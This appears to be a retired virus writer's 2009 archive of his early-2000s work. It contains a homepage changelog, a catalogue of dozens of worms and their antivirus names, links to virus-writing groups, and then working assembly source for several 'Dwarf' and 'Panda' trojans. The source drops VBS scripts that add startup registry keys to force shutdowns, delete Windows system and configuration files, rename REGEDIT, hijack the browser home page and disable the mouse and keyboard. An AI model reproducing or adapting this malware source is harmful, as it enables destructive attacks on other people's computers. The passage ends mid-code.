PetiK Archiver 1.0
17/05/2009

Seven years after I stopped coding viruses/worms, I decided to assemble all my works. They are sorted by date like this: YYYYMMDD (where Y is the year, M the month and D the day), followed by the name of the work. At the beginning you can see my old website page. Then my works. Next, my unfinished works and some articles. Happy reading.

PetiK Homepage
(last update: July 9th 2002)

EMAIL: petikvx@aol.com

NEW: FORUM FOR ALL VXERS. PLEASE SIGN MY GUESTBOOK.

2002:
- July 9th: GOOD BYE TO ALL VXERS. I LEAVE THE VX-SCENE. I HOPE YOU LIKE MY WORKS AND THAT THEY WILL HELP YOU IN YOUR VX-LIFE. IF YOU WANT TO CONTACT ME, PLEASE WRITE IN THE GUESTBOOK. Special thanks to: alc0paul, Benny/29A, Bumblebee, Vecna, Mandragore, ZeMacroKiller98 and the greatest coder group: 29A
- July 7th: Added some new AV descriptions (from Trend Micro and McAfee)
- July 3rd: Added the binary of my last worm, coded with alc0paul: VB.Brigada.Worm
- July 2nd: Added a new link: Second Part To Hell
- June 29th: Added my new tool, PetiK's VBS Hex Convert, and my last full-spread VBS worm: VBS.Hatred
- June 26th: Added W32/HTML.Dilan
- June 24th: Added VBS.Park
- June 22nd: Finished my new worm: VB.DocTor.Worm
- June 20th: PETIKVX EZINE #2 RELEASED: DOWNLOAD IT. Also added a new tool, CryptoText, and my last worm: VB.Mars.Worm
- June 19th: Added VBS.Cachemire. Added my new article VBS/HTML Multi-Infection.
- June 16th: I joined a new virus group: Brigada Ocho (created by alc0paul)
- June 1st: Added VB.Lili.Worm. My new worm is released: I-Worm.Haram
- May 31st: I left the rRlf group
- May 23rd: New ezine: rRlf#2
- May 19th: I removed some sources. You can find some of them in PetiKVX#1 and the others in PetiKVX#2. Finished VB.Visual.Worm, published in PetiKVX#2
- May 14th: Added W97M.ApiWord
- May 12th: Added W32.HLLW.Archiver
- May 10th: Added a new tool to protect against new VBS worms: PPVBSW
- May 9th: Added a new macro virus: W97M.AutoSpread
- May 8th: I joined the rRlf group (http://www.rrlf.de). Added HTML.Welcome.
- May 6th: Added a new article: VBS Tutorial, also available as PDF
- April 27th: Added VBS.Xchange
- April 21st: Added all the sources of my works.
- April 7th: Added my first ezine: PetiKVX Ezine #1. My new email is Petikvx@aol.com
- March 15th: Added I-Worm.Together
- March 14th: My new email: petikvx@lycos.fr (petikvx@multimania.com failed)
- March 10th: Added W32.HLLW.LiteLo
- March 9th: Added my articles in PDF format: articlesPDF and 29A#6.
- March 8th: Added my first VBS worm and HTML virus generator: PSWVG (W32.PSVG.gen: Norton AntiVirus, Constructor.VBS.PSWVG.10: AVP)
- March 3rd: Added a new virus/worm: VBS/W97M.Doublet
- February 25th: Added a macro virus: W97M.Wolf
- February 24th: Added a lame love worm: HTML.Linda
- February 22nd: Added W32.HLLW.Wargames
- February 18th: Added a new ezine: rRlf
- February 16th: Added my first virus (perhaps buggy): WinRAR.Linda
- February 14th: Added a new HTML virus: HTML.Macrophage
- February 10th: My last worm can now be downloaded. Added my second article: Technics
- February 7th: Finished my last worm: I-Worm.Falken (not downloadable immediately)
- February 4th: Added a new worm: I-Worm.Extract
- February 1st: New worm: W32/W97M.Twin
- January 27th: I came back with a new worm: HLLW.SingLung.Worm
- January 20th: Added PetiKShow. This program contains all the sources of my works.
- January 10th: Added an old article about worm spreading that I wrote on September 19th.
- January 1st: HAPPY NEW YEAR. I DECIDED TO STOP CODING VIRII AND WORMS. GOOD BYE

2001:
- December 10th: Added my last worm: W32.HLLW.Last
- November 6th: I-Worm.Anthrax
- October 12th: I-Worm.WTC
- September 8th: I-Worm.Passion
- September 2nd: I-Worm.Rush
- August 24th: I-Worm.Casper
- August 18th: Added the tool tElock 5.1 (a PE file compressor/encryptor)
- August 16th: I-Worm.Kevlar
- August 12th: New design. You can hear one of my compositions.
- August 9th: New descriptions from AVP of I-Worm.MadCow and I-Worm.Friends.
- August 8th: I-Worm.XFW
- July 18th: New family: W32.Pet_Tick family (6), VBS.Pet_Tick family (3) from Norton AntiVirus
- July 8th: I-Worm.MaLoTeYa
- July 3rd: VBS.Delirious
- June 30th: I-Worm.Bush
- June 19th: I-Worm.Winmine
- June 18th: W97M.Blood
- June 17th: VBS.Seven
- June 10th: VBS.Starmania, I-Worm.Gamma, W97M.Kodak
- June 4th: BAT.Quatuor
- June 3rd: Bastille, JS.Germinal
- June 2nd: Added some worms: HTML.Embargo, I-Worm.Mustard
- May 25th: I started my homepage.

Source
Here you can find the different worms and tools that I created. Dates are MM/DD/YYYY as on the original page; where the table did not record an AntiVirus name the cell is left empty.

Real Name | Date | AntiVirus Name (TM = Trend Micro) | Description
Bastille | 06/03/2001 | AVP: IRC.Worm.PetiK; TM: Bat.PetiK.A | A DOS worm. It uses mIRC to spread. On July 14th it shuts down the computer.
BAT.Quatuor | 06/04/2001 | IRC.Becky.A | A BAT file which uses mIRC to spread.
CryptoText | 06/20/2002 | | Tool coded in VB6. Encrypts ASCII files.
HTML.Bother | 05/13/2001 | HTML.Bother.3180; AVP: VBS.Both; TM: HTML.Bother.A | A script that uses ActiveX controls to perform its actions. It modifies the default home page and infects all .HTM and .HTML files it finds in the \MY DOCUMENTS and \WINDOWS\WEB folders. The default icon for .html files is changed.
HTML.Embargo | 05/29/2001 | VBS.Embaro.A.Intd | Copies itself to \WINDOWS\WinHelp.htm and changes AUTOEXEC.BAT. Uses a mIRC channel to spread.
HTML.Linda | 02/24/2002 | | Lame love worm.
HTML.Macrophage | 02/14/2002 | HTML.Prepend; Panda: HTML/Mage | Infects htm, html, htt, hta and asp files in several special folders.
HTML.Welcome | 05/08/2002 | VBS.Manu@mm; TM: VBS.PATIK.G | My first virus for the rRlf group. Infects web files (htm, html, htt, asp) and spreads with Outlook as a VBS file.
I-Worm.Anthrax | 11/06/2001 | W95.Pet_Tick.gen; TM: Worm.Pettick.A; Sophos: W32/Petick-A | Opens the default WAB file to collect e-mail addresses and spreads with MAPI. Spreads with mIRC too.
I-Worm.Bush | 06/30/2001 | W95.Pet_Tick.E@mm; AVP: I-Worm.PetiK.e | Uses MAPI to spread. No bugs.
I-Worm.Casper | 08/24/2001 | TM: Worm.Capser.A | A utility which detects Happy99 and Icecubes. Uses MAPI. Perhaps buggy.
I-Worm.Dandelion | 11/16/2001 | | UNRELEASED WORM
I-Worm.Extract | 02/04/2002 | Panda: W32/Extract; TM: WORM.PETIK.L | Opens KERNEL32.DLL to find the APIs it needs.
I-Worm.Falken | 07/02/2002 | | First WGAA worm. WARNING!
I-Worm.Friends | 05/05/2001 | W32.Pet_Tick.B; W32.Fiend.Worm; AVP: I-Worm.PetiK.b | Uses a VBS file and mIRC to spread. Alters the Windows registered owner and company.
I-Worm.Gamma | 05/09/2001 | W95.Pet_Tick.D@mm; W95.Wormfix.Worm@mm; AVP: I-Worm.PetiK.c | Scans all *.*htm* files in "Temporary Internet Files" and uses MAPI functions to spread.
I-Worm.Haram | 06/01/2002 | | Spreads with a randomly named VBS file in the StartUp folder and drops an HTML virus.
I-Worm.Kevlar | 08/16/2001 | W32.Pet_tick.M; TM: Worm.Kevlar.A; Panda: Worm.PetiK.C | Infects C???????.exe. Scans the Outlook Address Book for e-mail addresses and uses MAPI to spread.
I-Worm.Loft | 06/23/2001 | W32.Pet_Tick.Intd; Sophos: W32/Petik-K; AVP: I-Worm.PetiK.k; TM: Worm.PetiK.K | Uses MAPI functions to spread. Opens some DLL files to use their APIs.
I-Worm.MadCow | 12/01/2000 | W32.Pet_Tick.A@mm; W32.Salut.Worm@mm; AVP: I-Worm.PetiK.a | My first worm. It uses Outlook and mIRC to spread. It creates \SYSTEM\MSLS.ICO, which becomes the default icon of .exe files.
I-Worm.MaLoTeYa | 07/08/2001 | W32.Pet_Tick.G; W32.Malot.Int; AVP: I-Worm.PetiK.f; TM: Worm.Malot.A | Uses MAPI to spread. Creates an HTML file in the StartUp folder that sends some information about the user. CONTRIBUTED TO 29A#6.
I-Worm.Mustard | 05/27/2001 | W32.Update.Worm; AVP: I-Worm.PetiK.d; TM: Worm.Mustard.A | Modifies "Exclude.dat" in the Norton AntiVirus install folder to create a VBS file. The worm spreads with Outlook through this VBS file.
I-Worm.Passion | 09/08/2001 | W95.Pet_Tick.gen | Copies all addresses of the Outlook Address Book into a file and scans this file to spread. Changes some URLs 1 time in 10.
I-Worm.PetiK | 02/07/2001 | W95.Pet_Tick.C@mm; W95.Buggy.Worm@mm; AVP: I-Worm.IEPatch; TM: Worm.PetiK.A | Changes the wallpaper to a BMP file downloaded from an FTP site. Spreads with a VBS file which uses Outlook.
I-Worm.Rush | 02/09/2001 | TM: Worm.Rush.A | No bugs in the MAPI functions. Started propagating by mistake on August 30th. Some payloads keyed on window titles.
I-Worm.Together | 03/15/2002 | W32.Pet_Tick.AC@mm | Kills some AVs. 100% assembler.
I-Worm.Winmine | 06/19/2001 | W32.Mineup.Worm; AVP: I-Worm.Petik; McAfee: W32/PetTick@MM; Panda: W32/PetTick | Uses Outlook to spread.
I-Worm.WTC | 10/11/2001 | Sophos: W32/Petik-WTC; TM: WORM.PETTICK.Q | A worm against terrorism. Infects RAR files in the Personal directory.
I-Worm.XFW | 08/08/2001 | W95.Pet_tick.gen; TM: Trojan.PetiK.XFW; Panda: Worm.PetiK.D | Infects WSOCK32.DLL and all DLL files in the SYSTEM directory.
JS.Germinal | 06/02/2001 | JS.Lamnireg.A Trojan; AVP: JS.Germinal; TM: JS.Germinal.A | Infects JS files in the \WINDOWS, \WINDOWS\Desktop and \WINDOWS\SAMPLES\WSH directories. Uses mIRC to spread.
VB.Brigada.Worm | 07/03/2002 | TM: WORM.CRAZYBOX.A | Coded with alc0paul. Spreads with a Word macro, ZIP and Outlook. My last worm.
VB.DocTor.Worm | 06/22/2002 | W32/W97M.Dotor.Worm; McAfee: W32/DoTor; Panda: W32/Dotor.A | Spreads by infecting DOC files.
VB.Lili.Worm | 06/01/2002 | W32.Pet_Ticky.B; Panda: W32/Petlil.A | A lame worm with an XXX picture.
VB.Mars.Worm | 06/20/2002 | W32.Gubed.Worm; McAfee: W32/Gubed; TM: WORM.GUBED.A | Spreads by scanning the Internet Explorer start page for e-mail addresses. The binary is also stored inside a VBS file in the %StartUp% folder.
VB.Visual.Worm | 05/19/2002 | W32.Pet_Ticky.gen | My first worm coded in Visual Basic. Lame worm.
VBS.Cachemire | 06/19/2002 | | A worm which spreads on a local network and has a great spreading power.
VBS.Delirious | 07/03/2001 | VBS.Pet_Tick.C@m; VBS.Ketip.C@m; AVP: I-Worm.Petik.h | Puts its code in NORMAL.DOT.
VBS/W97M.Doublet | 03/03/2002 | VBS.Doublet@mm | Infects VBS and DOC files. Spreads with Outlook.
VBS/W97M.Xchange | 04/27/2002 | | Infects VBS files and Word DOC documents. CONTRIBUTED TO RRLF#2.
VBS.GoodBye | 12/01/2001 | | UNRELEASED WORM
VBS.Hatred | 06/29/2002 | | Encrypted with my tool "PetiK's VBS Hex Convert".
VBS.Judge | 12/08/2000 | VBS.Pet_Tick.B@mm; VBS.Ketip.B@mm | Uses FTP to download a file (virus? trojan horse?). On the 1st of the month, Judge modifies AUTOEXEC.BAT.
VBS.Park | 06/24/2002 | | A VBS/HTML multi-infection virus.
VBS.PetiK | 01/31/2001 | VBS.Pet_Tick.A@mm; VBS.Ketip.A@mm; AVP: I-Worm.LeeBased | Arrives as an HTML e-mail message. Uses Outlook and mIRC clients to spread. Infects several kinds of files and sends information from the infected computer to 2 e-mail addresses.
VBS.Seven | 06/18/2001 | VBS.Chism@mm; VBS.Copy.A@mm; AVP: I-Worm.Petik.i; TM: VBS.PETIK.I | Many actions, on any day.
VBS.Starmania | 06/15/2001 | VBS.ManiaStar.A@mm; AVP: IRC-Worm.generic.vbs | Infects all VBS files in several folders. Spreads with three different subjects, bodies and attachments.
W32.HLLW.Archiver | 05/12/2002 | | Infects ZIP files in certain folders.
W32.HLLW.Last | 10/12/2001 | Sophos: W32/Stall-A | My very first (and last) worm written with Borland C++.
W32.HLLW.LiteLo | 03/10/2002 | | A lame HLL worm.
W32.HLLW.SingLung | 01/27/2002 | AVP: I-Worm.Stopin | Opens *.ht* files to find e-mail addresses and spreads with MAPI functions.
W32.HLLW.Wargames | 02/22/2002 | AVP: I-Worm.WarGam; Viruslist: WarGame; W32.WarGam.Worm | Several propagation paths: opens *htm files, reads old mail, and the Outlook Address Book.
W32/W97M.Twin | 02/01/2002 | W97M.Comical; Sophos: W97M.Comical | Uses VBA and W32asm to spread.
W32/HTML.Dilan | 06/26/2002 | | Spreads via HTML files by infecting them in specific folders.
Win32RAR.Linda | 02/16/2002 | | Infects RAR files by adding the virus, and HTM files by adding a script.
W97M.ApiWord | 05/14/2002 | W97M.Apish | Uses some APIs to infect Word documents.
W97M.AutoSpread | 05/09/2002 | W97M.Beko@mm | Spreads widely. Exports the "Sleep" API.
W97M.Blood | 06/18/2001 | W97M.Pet_Tick.Intd; W97M.Ketip.Intd; AVP: Embedded | Infects NORMAL.DOT.
W97M.Kodak | 06/10/2001 | W97M.Adok.A; AVP: Macro.Word97.Adok | Infects NORMAL.DOT.
W97M.Maya | 06/05/2001 | W97M.OutlookWorm.Gen; AVP: Macro.Office.Melissabased; TM: W97M.AYAM.A | Uses mIRC and Outlook to spread.
W97M.Wolf | 02/25/2002 | W97M.Droopy.A | Infects .doc files with the "Wolf" module. Thanks to Walrus.

Links
A selection of the best virii sites:

VirLinux: http://www.virlinux.fr.fm (a French site about Linux virii)

VIRUS CODERS:
Alc0paul: http://alcopaul.cjb.net
Belial: http://home.foni.net/~belial
Benny: http://www.coderz.net/benny
Black Jack: http://blackjackvx.cjb.net
Del_Armg0: http://www.delly.fr.st (French coder)
FlyShadow: http://flyshadow.cjb.net
Gigabyte: http://www.coderz.net/gigabyte
Immortal Riot: http://www.immortalriot.cjb.net
Kalanar: http://virii.at/ak or http://www.kvirii.com.ar
Lord Julus: http://lordjulus.cjb.net
NBK: http://www.nbk.hpg.ig.com.br
Nucleii: http://www.coderz.net/nucleii/main.html
Pointbat: http://pbat.cjb.net/ (French coder)
Silvio: http://www.big.net.au/~silvio/
Ratter: http://www.coderz.net/ratter/
SPTH (Second Part To Hell): http://www.spth.de.vu/
The Walrus: http://walrus.up.to
Tipiax: http://www.multimania.com/tipiax (French coder)
Vecna: http://www.coderz.net/asm_infamy
VirusBuster: http://vtc.cjb.net
Voven/SMF: http://vovan-smf.wz.cz/
VXUniverse: http://vxuniverse.cjb.net
ZeMacroKiller98: http://www.crosswinds.net/~zemacrokiller98/index.htm (French coder)
Zulu: http://www.coderz.net/zulu

VX GROUPS:
29A: http://29a.host.sk
ASM: http://kickme.to/asm
BlackArt: http://blackart.cjb.net
Black Cat virii Group: http://www.ebcvg.com or http://bcvgvx.cjb.net/
Brigada Ocho: http://brigada8.cjb.net
HFX: http://www.hfactorx.org/
Indonesian Virus: http://indovirus.8m.com/
Kryptocrew: http://www.kryptocrew.de
LineZero: http://www.coderz.net/lz0vx/start.htm
MATRiX: http://www.coderz.net/mtxvx
NoMercy: http://www.coderz.net/nomercy/
Pinoy Virus Writer: http://hackers.b3.nu
rRlf: http://www.rrlf.de/
ShadowVX: http://shadowvx.members.easyspace.com/
SMF: http://www.sallyone.com/smf/e_index.htm, http://smfgroup.cjb.net
Ultimate Chaos: http://www.ultimatechaos.co.uk/
Virus Brasil: http://www.virusbrasil.8m.com

OTHER SITES:
Coderz: http://www.coderz.net
Red Virica: http://redvirica.host.sk/
Virii Argentino: http://www.virii.com.ar
Virus Central: http://www.viruscentral.org/
VirusList: http://www.viruslist.com
Virus Trading Center: http://www.oninet.es/usuarios/darknode/
VX-DNET: http://surf.to/vxdnet
VX Heavens: http://vx.netlux.org/
Virus Trading: http://www.virustrading.com/
VX Universe: http://vxuniverse.cjb.net/
ExeTools: http://www.exetools.com
ProTools: http://protools.cjb.net

ANTIVIRUS SITES:
AVP: http://www.avp.ch
Symantec: http://www.symantec.com/avcenter
Trend Micro: http://www.trendmicro.com

CONTACT: GuestBook

© 2001-2002 PetiK. All information on this site is for educational purposes only.

;DWARF (31/08/00)
;SIZE: 475 BYTES
;DWARF creates a file dwarf.vbs which adds a registry key so that
;the computer shuts down at startup.

.model small
.code
org 100h

DEBUT:
        mov ah,09h
        lea dx,text1
        int 21h                         ;display a message with two options
TOUCHE:
        mov ah,1
        int 21h                         ;read the character
        cmp al,'C'
        je CREER_FICHIER                ;'C'/'c': continue
        cmp al,'c'
        je CREER_FICHIER
        cmp al,'Q'
        je FIN_PROGRAMME                ;'Q'/'q': quit
        cmp al,'q'
        je FIN_PROGRAMME
        mov dx,offset bad
        mov ah,9h
        int 21h                         ;wrong key: beep, then read again
        jmp TOUCHE

CREER_FICHIER:
        mov ah,3Ch
        xor cx,cx
        mov dx,offset NOM
        int 21h                         ;create the file and give it a name
ECRIRE_FICHIER:
        xchg ax,bx
        mov ah,40h
        mov cx,meslen
        mov dx,offset note
        int 21h                         ;write the script into the file
FERMER_FICHIER:
        mov ah,3Eh
        int 21h                         ;then close it
        mov dx,offset updir
        mov ah,3Bh
        int 21h                         ;change directory
MESSAGE:
        mov ah,09h
        lea dx,msg
        int 21h                         ;display the message
FIN_PROGRAMME:
        mov ah,4Ch
        int 21h                         ;exit the program

text1   db 10,13,'Tape C pour continuer ou Q pour quitter : $'
bad     db 7,7,8,' ',8,24h
NOM     db 'c:\dwarf.vbs',0
updir   db '..',0
msg     db 7,7,7,10,13,'SALUT MEC !!!!'
        db 10,10,13,'UN FICHIER A ETE RAJOUTE'
        db 10,13,'IL SE NOMME C:\dwarf.vbs $'
note    db 'rem DwArF.vbs by Panda '
        db '(c) 2000'                    ;no CR/LF here, so the rem line runs on into the Dim
prog    db 'Dim WSHShell',0Dh,0Ah
        db 'Set WSHShell = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah
        db 'WSHShell.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\'
        db 'Windows\CurrentVersion\Run\DwArF", "C:\WINDOWS\RUNDLL32.EXE '
        db 'C:\Windows\system\User.exe,ExitWindows"'
meslen  equ $-note                      ;length of the dropped script

end DEBUT

;By M.Xxxxxxx XXXXXXX (c)2000                           09/09/00
;SIZE: 689 BYTES
;FIRST TESTED AT THE LYCEE KIRSCHLEGER IN MUNSTER
;DWARF259 CREATES TWO PROGRAMS:
; -Dwarf.vbs in C:, which runs Evil.com at every startup
; -Evil.com in C:\WINDOWS.
;On 25 September it renames REGEDIT.EXE into the recycle bin
;as DWARF.AZE and deletes AUTOEXEC.BAT and WIN.INI

.model small
.code
org 100h
TOUT_DEBUT:
        jmp FILE1
;From VERIFICATION up to progl2 is the body of Evil.com. It is written out
;as-is, so its offsets are still relative to this file (3 bytes higher than
;where Evil.com itself loads); reproduced as in the original.
VERIFICATION:
        mov ah,2Ah
        int 21h                         ;get the date
        cmp dh,9                        ;25 SEPTEMBER?
        jnz FIN_VIRUS                   ;NO: END OF THE TROJAN
        cmp dl,25
        jnz FIN_VIRUS
AFFICHE:
        mov ah,9
        lea dx,MSG
        int 21h
DISQUE:
        mov ah,41h
        mov dx,offset AUTOEXEC
        int 21h                         ;DELETE AUTOEXEC.BAT
        mov dx,offset WININI
        int 21h                         ;DELETE WIN.INI
        mov ah,56h
        mov dx,offset REG
        mov di,offset CORBEILLE
        int 21h                         ;RENAME REGEDIT.EXE TO DWARF.AZE
FIN_VIRUS:
        mov ah,4Ch
        int 21h
MSG     db 7,7,7,'TROJAN.DWARF par PandaKiller (c)2000'
        db 10,10,13,'BOOM! BOOM! BOOM! BOOM! BOOM! BOOM!'
        db 10,13,' ÛÛÛ Û Û ÛÛ ÛÛÛ ÛÛÛÛ'
        db 10,13,' Û Û Û Û Û Û Û Û Û '
        db 10,13,' Û Û Û Û ÛÛÛÛ ÛÛÛ ÛÛÛ '
        db 10,13,' Û Û Û Û Û Û Û Û Û Û '
        db 10,13,' ÛÛÛ Û Û Û Û Û Û Û $'
WININI  db 'C:\WINDOWS\Win.ini',0
AUTOEXEC db 'C:\autoexec.bat',0
REG     db 'C:\WINDOWS\Regedit.exe',0
CORBEILLE db 'C:\RECYCLED\dwarf.aze',0
progl2  equ $-VERIFICATION

FILE1:
        mov ah,3Ch
        xor cx,cx
        mov dx,offset NOM1
        int 21h                         ;CREATE THE 1ST FILE
        xchg ax,bx
        mov ah,40h
        mov cx,progl1                   ;PROGRAM LENGTH
        mov dx,offset prog1             ;PROGRAM START
        int 21h                         ;WRITE
        mov ah,3Eh
        int 21h                         ;CLOSE
FILE2:
        mov ah,3Ch
        xor cx,cx
        mov dx,offset NOM2
        int 21h                         ;CREATE THE 2ND FILE
        xchg ax,bx
        mov ah,40h
        mov cx,progl2                   ;PROGRAM LENGTH
        lea dx,VERIFICATION             ;PROGRAM START
        int 21h                         ;WRITE
        mov ah,3Eh
        int 21h                         ;CLOSE
FIN:
        mov ah,4Ch
        int 21h

NOM1    db 'c:\Dwarf.vbs',0
NOM2    db 'c:\WINDOWS\Evil.com',0
prog1   db 'rem DwArF.vbs by Panda (c)2000',0Dh,0Ah
        db 'msgbox "C''EST PARTI",vbcritical',0Dh,0Ah
        db 'Dim W',0Dh,0Ah
        db 'Set W = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah
        db 'W.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows'
        db '\CurrentVersion\Run\DwArF", "C:\WINDOWS\Evil.com"'
progl1  equ $-prog1
end TOUT_DEBUT

;By M.Xxxxxxx XXXXXXX (c)2000                           12/09/00
;SIZE: 1282 BYTES
;DWARF7 CREATES TWO PROGRAMS: Dwarf.vbs and Panda.vbs. DWARF.VBS
;ADDS A KEY THAT RUNS PANDA.VBS EVERY DAY. PANDA.VBS ONLY ACTS ON
;5 DECEMBER: IT ADDS A KEY THAT SHUTS THE COMPUTER DOWN AT STARTUP
;AND CREATES AN AUTOEXE.BAT FILE THAT WILL DELETE FILES ON THE COMPUTER.

.model small
.code
org 100h
FILE1:
        mov ah,3Ch
        xor cx,cx
        mov dx,offset NOM1
        int 21h                         ;create the 1st file
        xchg ax,bx
        mov ah,40h
        mov cx,progl1
        mov dx,offset prog1
        int 21h                         ;write
        mov ah,3Eh
        int 21h                         ;close
FILE2:
        mov ah,3Ch
        xor cx,cx
        mov dx,offset NOM2
        int 21h                         ;create the 2nd file
        xchg ax,bx
        mov ah,40h
        mov cx,progl2
        mov dx,offset prog2
        int 21h                         ;write
        mov ah,3Eh
        int 21h                         ;close
MESSAGE:
        mov ax,3
        int 10h                         ;set text mode 3 (clears the screen)
        mov ah,9
        lea dx,msg
        int 21h
FIN:
        mov ah,4Ch
        int 21h

NOM1    db 'c:\Dwarf.vbs',0
NOM2    db 'c:\WINDOWS\Panda.vbs',0
prog1   db 'rem DwArF.vbs by Panda (c)2000',0Dh,0Ah
        db 'msgbox "BONNO JOURNEE ?",vbexclamation',0Dh,0Ah
        db 'Dim W',0Dh,0Ah
        db 'Set W = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah
        db 'W.Regwrite "HKLM\Software\Microsoft\Windows'
        db '\CurrentVersion\Run\DwArF", "C:\WINDOWS\Panda.vbs"'
progl1  equ $-prog1
prog2   db 'If Day(Now) = 5 And Month(Now) = 12 Then',0Dh,0Ah
        db 'msgbox "ERREUR : CLIQUEZ SUR OK",vbcritical',0Dh,0Ah
        db 'Dim W',0Dh,0Ah
        db 'Set W=CreateObject("WScript.Shell")',0Dh,0Ah
        db 'W.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\'
        db 'Run\DwArF", "C:\WINDOWS\RUNDLL32.EXE '
        db '%windir%\system\user.exe,Exitwindows"',0Dh,0Ah
        db 'W.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\'
        db 'Run\DwArF2", "C:\autoexe.bat"',0Dh,0Ah
        db 'Set X=CreateObject("Scripting.FileSystemObject")',0Dh,0Ah
        db 'file="C:\autoexe.bat"',0Dh,0Ah
        db 'Set O=X.CreateTextFile(file, True, False)',0Dh,0Ah
        db 'O.Writeline "@echo off"',0Dh,0Ah
        db 'O.Writeline "del C:\WINDOWS\*.ini"',0Dh,0Ah
        db 'O.Writeline "del C:\WINDOWS\*.sys"',0Dh,0Ah
        db 'O.Writeline "del C:\WINDOWS\*.bmp"',0Dh,0Ah
        db 'O.Writeline "del C:\WINDOWS\*.sys"',0Dh,0Ah
        db 'O.Writeline "del C:\WINDOWS\E*.*"',0Dh,0Ah
        db 'O.Writeline "del C:\WINDOWS\M*.*"',0Dh,0Ah
        db 'O.Writeline "del C:\WINDOWS\COMMAND\*.*"',0Dh,0Ah
        db 'O.Writeline "del C:\WINDOWS\SYSTEM\*.dll"',0Dh,0Ah
        db 'O.Writeline "del C:\WINDOWS\SYSTEM\*.ini"',0Dh,0Ah
        db 'msgbox "TU VAS MOURIR DEMAIN",vbinformation',0Dh,0Ah
        db 'End If',0Dh,0Ah
progl2  equ $-prog2
msg     db 7,7,7,10,13,'UN FICHIER A ETE CREE',0Ah,0Ah,0Dh
        db 'IL SE NOMME C:\Dwarf.vbs',10,10,13
        db 'OUVRE LE VITE $'
end FILE1

;Panda3.asm by PandaKiller                              03/10/00
;TASM32 /M /ML panda3
;TLINK32 -Tpe -x -aa panda3,,,import32
.386
locals
jumps
.model flat
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn CloseHandle:PROC
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
extrn MessageBoxA:PROC
extrn WinExec:PROC
extrn ExitProcess:PROC

.data
octets      dd ?
flz_handle  dd ?
nom_fichier db 'C:\Salut.vbs',00h
prog        db 'C:\Salut.vbs',00h
TEXTE       db 'Salut ! Ca va ?',00h
TITRE       db 'Hello',00h
TEXTE2      db 'J''ai mis un fichier sur ton ordinateur',0dh,0ah
            db 'Il s''appelle Salut.vbs et se trouve dans C:\',0dh,0ah
            db 'Ouvre-le vite',00h
TITRE2      db 'FICHIER CREE',00h
CLE         db '\Software\Microsoft\Windows\CurrentVersion',00h
DONNEE      db 'PandaKiller',00h
NOM         db 'RegisteredOwner',00h
p           dd 0
l           dd 0

;The dropped Salut.vbs, stored verbatim. Note that the Run entry points at
;%system%\WSock32.dll.vbs while the script copies itself to %windir%\WSock32.dll.vbs
;(the %system% copy is named PandaDwarf.txt.vbs); kept as in the original.
DEBUTV:
db '''VBS/PandaKiller.Trojan.A PAR Pentasm99 (c)2000 03/10/00',0dh,0ah
db '''SE COPIE DANS WINDOWS ET WINDOWS\SYSTEM',0dh,0ah
db '',0dh,0ah
db 'DEBUT()',0dh,0ah
db 'Sub DEBUT()',0dh,0ah
db 'Set a = CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set win = a.GetSpecialFolder(0)',0dh,0ah
db 'Set sys = a.GetSpecialFolder(1)',0dh,0ah
db 'Set c = a.GetFile(WScript.ScriptFullName)',0dh,0ah
db 'c.Copy(win&"\WSock32.dll.vbs")',0dh,0ah
db 'c.Copy(sys&"\PandaDwarf.txt.vbs")',0dh,0ah
db 'INTERNET()',0dh,0ah
db 'BUG2001()',0dh,0ah
db 'Set T = a.deletefile("C:\Salut.vbs")',0dh,0ah
db 'End Sub',0dh,0ah
db '',0dh,0ah
db '''MODIFIE LA PAGE INTERNET ET RAJOUTE UN RESISTRE DANS "RUN"',0dh,0ah
db 'Sub INTERNET()',0dh,0ah
db 'Dim W',0dh,0ah
db 'Set W = Wscript.CreateObject("WScript.Shell")',0dh,0ah
db 'W.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\'
db 'Start Page", "http://www.penthouse.com"',0dh,0ah
db 'W.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\'
db 'StartWindoz", "C:\WINDOWS\SYSTEM\WSock32.dll.vbs"',0dh,0ah
db 'End Sub',0dh,0ah
db '',0dh,0ah
db '''DESACTIVE LA SOURIS ET LE CLAVIER EN 2001 ET EXECUTE WINMINE',0dh,0ah
db 'Sub BUG2001()',0dh,0ah
db 'If Year(Now) = 2001 Then',0dh,0ah
db ' Dim P',0dh,0ah
db ' Set P = Wscript.CreateObject("WScript.Shell")',0dh,0ah
db ' P.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\'
db 'Stop1", "rundll32,mouse disable"',0dh,0ah
db ' P.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\'
db 'Stop2", "rundll32,keyboard disable"',0dh,0ah
db ' P.run ("C:\WINDOWS\Winmine.exe")',0dh,0ah
db 'End If',0dh,0ah
db 'End Sub',0dh,0ah
taille equ $-DEBUTV

.code
REGISTRE:
        push offset l                   ;lpdwDisposition
        push offset p                   ;phkResult
        push 0                          ;lpSecurityAttributes
        push 1F0000h + 1 + 2h           ;STANDARD_RIGHTS_ALL | KEY_QUERY_VALUE | KEY_SET_VALUE
        push 0                          ;dwOptions
        push 0                          ;lpClass
        push 0                          ;Reserved
        push offset CLE                 ;\Software\Microsoft\Windows\CurrentVersion
        push 80000002h                  ;HKEY_LOCAL_MACHINE
        call RegCreateKeyExA
        push 05h                        ;cbData = 5, shorter than "PandaKiller"
        push offset DONNEE              ;PandaKiller
        push 01h                        ;REG_SZ
        push 0
        push offset NOM                 ;into RegisteredOwner
        push p
        call RegSetValueExA             ;create the registry value
        push 0
        call RegCloseKey                ;close the registry (passes 0, not p; as in the original)
FICHIER:
        push 00h                        ;hTemplateFile
        push 80h                        ;FILE_ATTRIBUTE_NORMAL
        push 02h                        ;CREATE_ALWAYS
        push 00h                        ;lpSecurityAttributes
        push 01h                        ;FILE_SHARE_READ
        push 40000000h                  ;GENERIC_WRITE
        push offset nom_fichier         ;give the file name
        call CreateFileA
        mov [flz_handle],eax
        push 00000000h                  ;lpOverlapped
        push offset octets              ;lpNumberOfBytesWritten
